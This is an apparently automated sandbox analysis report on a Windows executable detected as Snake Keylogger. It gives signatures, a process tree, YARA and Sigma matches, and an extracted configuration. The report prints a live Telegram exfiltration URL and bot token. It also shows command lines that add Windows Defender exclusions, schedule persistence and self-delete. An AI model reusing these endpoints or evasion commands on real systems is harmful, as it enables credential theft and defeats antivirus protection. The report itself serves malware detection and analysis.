Edit tour

Windows Analysis Report
PROFORMA + PENDENTES.exe

Overview

General Information

Sample name:	PROFORMA + PENDENTES.exe
Analysis ID:	1557908
MD5:	4d74cebd8ddaae78de8144f1abb245e5
SHA1:	8e8423e4af53a91b9750014235773f9ec38916df
SHA256:	2a2625e85758dfdc4ab64036bb679f519b8802ecccdba37eec44fb99e68e35a9
Tags:	exeuser-abuse_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Self deletion via cmd or bat file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PROFORMA + PENDENTES.exe (PID: 7924 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)

powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2332 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7268 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PROFORMA + PENDENTES.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)

PROFORMA + PENDENTES.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)

PROFORMA + PENDENTES.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)

cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 3660 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

WYqxTmjfOgdZ.exe (PID: 5512 cmdline: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)

schtasks.exe (PID: 7096 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WYqxTmjfOgdZ.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)

cmd.exe (PID: 4424 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 4920 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ/sendMessage?chat_id=5985897351", "Token": "8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ", "Chat_id": "5985897351", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14879:$a1: get_encryptedPassword 0x14b65:$a2: get_encryptedUsername 0x14685:$a3: get_timePasswordChanged 0x14780:$a4: get_passwordField 0x1488f:$a5: set_encryptedPassword 0x15ed0:$a7: get_logins 0x15e33:$a10: KeyLoggerEventArgs 0x15a9e:$a11: KeyLoggerEventArgsEventHandler
0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19808:$x1: $%SMTPDV$ 0x181ec:$x2: $#TheHashHere%& 0x197b0:$x3: %FTPDV$ 0x1818c:$x4: $%TelegramDv$ 0x15a9e:$x5: KeyLoggerEventArgs 0x15e33:$x5: KeyLoggerEventArgs 0x197d4:$m2: Clipboard Logs ID 0x19a12:$m2: Screenshot Logs ID 0x19b22:$m2: keystroke Logs ID 0x19dfc:$m3: SnakePW 0x199ea:$m4: \SnakeKeylogger\
00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c1929:$a1: get_encryptedPassword 0x1e2349:$a1: get_encryptedPassword 0x202b69:$a1: get_encryptedPassword 0x1c1c15:$a2: get_encryptedUsername 0x1e2635:$a2: get_encryptedUsername 0x202e55:$a2: get_encryptedUsername 0x1c1735:$a3: get_timePasswordChanged 0x1e2155:$a3: get_timePasswordChanged 0x202975:$a3: get_timePasswordChanged 0x1c1830:$a4: get_passwordField 0x1e2250:$a4: get_passwordField 0x202a70:$a4: get_passwordField 0x1c193f:$a5: set_encryptedPassword 0x1e235f:$a5: set_encryptedPassword 0x202b7f:$a5: set_encryptedPassword 0x1c2f80:$a7: get_logins 0x1e39a0:$a7: get_logins 0x2041c0:$a7: get_logins 0x1c2ee3:$a10: KeyLoggerEventArgs 0x1e3903:$a10: KeyLoggerEventArgs 0x204123:$a10: KeyLoggerEventArgs
00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1c68b8:$x1: $%SMTPDV$ 0x1e72d8:$x1: $%SMTPDV$ 0x207af8:$x1: $%SMTPDV$ 0x1c529c:$x2: $#TheHashHere%& 0x1e5cbc:$x2: $#TheHashHere%& 0x2064dc:$x2: $#TheHashHere%& 0x1c6860:$x3: %FTPDV$ 0x1e7280:$x3: %FTPDV$ 0x207aa0:$x3: %FTPDV$ 0x1c523c:$x4: $%TelegramDv$ 0x1e5c5c:$x4: $%TelegramDv$ 0x20647c:$x4: $%TelegramDv$ 0x1c2b4e:$x5: KeyLoggerEventArgs 0x1c2ee3:$x5: KeyLoggerEventArgs 0x1e356e:$x5: KeyLoggerEventArgs 0x1e3903:$x5: KeyLoggerEventArgs 0x203d8e:$x5: KeyLoggerEventArgs 0x204123:$x5: KeyLoggerEventArgs 0x1c6884:$m2: Clipboard Logs ID 0x1c6ac2:$m2: Screenshot Logs ID 0x1c6bd2:$m2: keystroke Logs ID
0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80dd2:$a1: get_encryptedPassword 0x810b4:$a2: get_encryptedUsername 0x80be8:$a3: get_timePasswordChanged 0x80ce3:$a4: get_passwordField 0x80de8:$a5: set_encryptedPassword 0x832bc:$a7: get_logins 0x8321f:$a10: KeyLoggerEventArgs 0x82e8a:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x82e8a:$x5: KeyLoggerEventArgs 0x8321f:$x5: KeyLoggerEventArgs 0x83b26:$x5: KeyLoggerEventArgs 0x83e87:$x5: KeyLoggerEventArgs 0x8544a:$m2: Clipboard Logs ID 0x85550:$m2: Screenshot Logs ID 0x855a6:$m2: keystroke Logs ID 0x856db:$m3: SnakePW 0x8553c:$m4: \SnakeKeylogger\
Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x16ca5:$a1: get_encryptedPassword 0x16f87:$a2: get_encryptedUsername 0x16abb:$a3: get_timePasswordChanged 0x16bb6:$a4: get_passwordField 0x16cbb:$a5: set_encryptedPassword 0x1918f:$a7: get_logins 0x190f2:$a10: KeyLoggerEventArgs 0x18d5d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18d5d:$x5: KeyLoggerEventArgs 0x190f2:$x5: KeyLoggerEventArgs 0x199f9:$x5: KeyLoggerEventArgs 0x19d5a:$x5: KeyLoggerEventArgs 0x1b31d:$m2: Clipboard Logs ID 0x1b423:$m2: Screenshot Logs ID 0x1b479:$m2: keystroke Logs ID 0x1b5ae:$m3: SnakePW 0x1b40f:$m4: \SnakeKeylogger\
Process Memory Space: WYqxTmjfOgdZ.exe PID: 5420	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.PROFORMA + PENDENTES.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.PROFORMA + PENDENTES.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.PROFORMA + PENDENTES.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.PROFORMA + PENDENTES.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a79:$a1: get_encryptedPassword 0x14d65:$a2: get_encryptedUsername 0x14885:$a3: get_timePasswordChanged 0x14980:$a4: get_passwordField 0x14a8f:$a5: set_encryptedPassword 0x160d0:$a7: get_logins 0x16033:$a10: KeyLoggerEventArgs 0x15c9e:$a11: KeyLoggerEventArgsEventHandler
11.2.PROFORMA + PENDENTES.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5f0:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba23:$a4: \Orbitum\User Data\Default\Login Data 0x1ca62:$a5: \Kometa\User Data\Default\Login Data
11.2.PROFORMA + PENDENTES.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15646:$s1: UnHook 0x1564d:$s2: SetHook 0x15655:$s3: CallNextHook 0x15662:$s4: _hook
11.2.PROFORMA + PENDENTES.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a08:$x1: $%SMTPDV$ 0x183ec:$x2: $#TheHashHere%& 0x199b0:$x3: %FTPDV$ 0x1838c:$x4: $%TelegramDv$ 0x15c9e:$x5: KeyLoggerEventArgs 0x16033:$x5: KeyLoggerEventArgs 0x199d4:$m2: Clipboard Logs ID 0x19c12:$m2: Screenshot Logs ID 0x19d22:$m2: keystroke Logs ID 0x19ffc:$m3: SnakePW 0x19bea:$m4: \SnakeKeylogger\
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c79:$a1: get_encryptedPassword 0x12f65:$a2: get_encryptedUsername 0x12a85:$a3: get_timePasswordChanged 0x12b80:$a4: get_passwordField 0x12c8f:$a5: set_encryptedPassword 0x142d0:$a7: get_logins 0x14233:$a10: KeyLoggerEventArgs 0x13e9e:$a11: KeyLoggerEventArgsEventHandler
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197f0:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c23:$a4: \Orbitum\User Data\Default\Login Data 0x1ac62:$a5: \Kometa\User Data\Default\Login Data
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13846:$s1: UnHook 0x1384d:$s2: SetHook 0x13855:$s3: CallNextHook 0x13862:$s4: _hook
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c08:$x1: $%SMTPDV$ 0x165ec:$x2: $#TheHashHere%& 0x17bb0:$x3: %FTPDV$ 0x1658c:$x4: $%TelegramDv$ 0x13e9e:$x5: KeyLoggerEventArgs 0x14233:$x5: KeyLoggerEventArgs 0x17bd4:$m2: Clipboard Logs ID 0x17e12:$m2: Screenshot Logs ID 0x17f22:$m2: keystroke Logs ID 0x181fc:$m3: SnakePW 0x17dea:$m4: \SnakeKeylogger\
0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c79:$a1: get_encryptedPassword 0x12f65:$a2: get_encryptedUsername 0x12a85:$a3: get_timePasswordChanged 0x12b80:$a4: get_passwordField 0x12c8f:$a5: set_encryptedPassword 0x142d0:$a7: get_logins 0x14233:$a10: KeyLoggerEventArgs 0x13e9e:$a11: KeyLoggerEventArgsEventHandler
0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197f0:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c23:$a4: \Orbitum\User Data\Default\Login Data 0x1ac62:$a5: \Kometa\User Data\Default\Login Data
0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13846:$s1: UnHook 0x1384d:$s2: SetHook 0x13855:$s3: CallNextHook 0x13862:$s4: _hook
0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c08:$x1: $%SMTPDV$ 0x165ec:$x2: $#TheHashHere%& 0x17bb0:$x3: %FTPDV$ 0x1658c:$x4: $%TelegramDv$ 0x13e9e:$x5: KeyLoggerEventArgs 0x14233:$x5: KeyLoggerEventArgs 0x17bd4:$m2: Clipboard Logs ID 0x17e12:$m2: Screenshot Logs ID 0x17f22:$m2: keystroke Logs ID 0x181fc:$m3: SnakePW 0x17dea:$m4: \SnakeKeylogger\
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a79:$a1: get_encryptedPassword 0x35299:$a1: get_encryptedPassword 0x14d65:$a2: get_encryptedUsername 0x35585:$a2: get_encryptedUsername 0x14885:$a3: get_timePasswordChanged 0x350a5:$a3: get_timePasswordChanged 0x14980:$a4: get_passwordField 0x351a0:$a4: get_passwordField 0x14a8f:$a5: set_encryptedPassword 0x352af:$a5: set_encryptedPassword 0x160d0:$a7: get_logins 0x368f0:$a7: get_logins 0x16033:$a10: KeyLoggerEventArgs 0x36853:$a10: KeyLoggerEventArgs 0x15c9e:$a11: KeyLoggerEventArgsEventHandler 0x364be:$a11: KeyLoggerEventArgsEventHandler
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cbde:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5f0:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be10:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba23:$a4: \Orbitum\User Data\Default\Login Data 0x3c243:$a4: \Orbitum\User Data\Default\Login Data 0x1ca62:$a5: \Kometa\User Data\Default\Login Data 0x3d282:$a5: \Kometa\User Data\Default\Login Data
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15646:$s1: UnHook 0x35e66:$s1: UnHook 0x1564d:$s2: SetHook 0x35e6d:$s2: SetHook 0x15655:$s3: CallNextHook 0x35e75:$s3: CallNextHook 0x15662:$s4: _hook 0x35e82:$s4: _hook
0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a08:$x1: $%SMTPDV$ 0x3a228:$x1: $%SMTPDV$ 0x183ec:$x2: $#TheHashHere%& 0x38c0c:$x2: $#TheHashHere%& 0x199b0:$x3: %FTPDV$ 0x3a1d0:$x3: %FTPDV$ 0x1838c:$x4: $%TelegramDv$ 0x38bac:$x4: $%TelegramDv$ 0x15c9e:$x5: KeyLoggerEventArgs 0x16033:$x5: KeyLoggerEventArgs 0x364be:$x5: KeyLoggerEventArgs 0x36853:$x5: KeyLoggerEventArgs 0x199d4:$m2: Clipboard Logs ID 0x19c12:$m2: Screenshot Logs ID 0x19d22:$m2: keystroke Logs ID 0x3a1f4:$m2: Clipboard Logs ID 0x3a432:$m2: Screenshot Logs ID 0x3a542:$m2: keystroke Logs ID 0x19ffc:$m3: SnakePW 0x3a81c:$m3: SnakePW 0x19bea:$m4: \SnakeKeylogger\
0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a79:$a1: get_encryptedPassword 0x35499:$a1: get_encryptedPassword 0x55cb9:$a1: get_encryptedPassword 0x14d65:$a2: get_encryptedUsername 0x35785:$a2: get_encryptedUsername 0x55fa5:$a2: get_encryptedUsername 0x14885:$a3: get_timePasswordChanged 0x352a5:$a3: get_timePasswordChanged 0x55ac5:$a3: get_timePasswordChanged 0x14980:$a4: get_passwordField 0x353a0:$a4: get_passwordField 0x55bc0:$a4: get_passwordField 0x14a8f:$a5: set_encryptedPassword 0x354af:$a5: set_encryptedPassword 0x55ccf:$a5: set_encryptedPassword 0x160d0:$a7: get_logins 0x36af0:$a7: get_logins 0x57310:$a7: get_logins 0x16033:$a10: KeyLoggerEventArgs 0x36a53:$a10: KeyLoggerEventArgs 0x57273:$a10: KeyLoggerEventArgs
0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cdde:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d5fe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5f0:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c010:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c830:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba23:$a4: \Orbitum\User Data\Default\Login Data 0x3c443:$a4: \Orbitum\User Data\Default\Login Data 0x5cc63:$a4: \Orbitum\User Data\Default\Login Data 0x1ca62:$a5: \Kometa\User Data\Default\Login Data 0x3d482:$a5: \Kometa\User Data\Default\Login Data 0x5dca2:$a5: \Kometa\User Data\Default\Login Data
0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x15646:$s1: UnHook 0x36066:$s1: UnHook 0x56886:$s1: UnHook 0x1564d:$s2: SetHook 0x3606d:$s2: SetHook 0x5688d:$s2: SetHook 0x15655:$s3: CallNextHook 0x36075:$s3: CallNextHook 0x56895:$s3: CallNextHook 0x15662:$s4: _hook 0x36082:$s4: _hook 0x568a2:$s4: _hook
0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a08:$x1: $%SMTPDV$ 0x3a428:$x1: $%SMTPDV$ 0x5ac48:$x1: $%SMTPDV$ 0x183ec:$x2: $#TheHashHere%& 0x38e0c:$x2: $#TheHashHere%& 0x5962c:$x2: $#TheHashHere%& 0x199b0:$x3: %FTPDV$ 0x3a3d0:$x3: %FTPDV$ 0x5abf0:$x3: %FTPDV$ 0x1838c:$x4: $%TelegramDv$ 0x38dac:$x4: $%TelegramDv$ 0x595cc:$x4: $%TelegramDv$ 0x15c9e:$x5: KeyLoggerEventArgs 0x16033:$x5: KeyLoggerEventArgs 0x366be:$x5: KeyLoggerEventArgs 0x36a53:$x5: KeyLoggerEventArgs 0x56ede:$x5: KeyLoggerEventArgs 0x57273:$x5: KeyLoggerEventArgs 0x199d4:$m2: Clipboard Logs ID 0x19c12:$m2: Screenshot Logs ID 0x19d22:$m2: keystroke Logs ID
Click to see the 28 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ProcessId: 8152, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

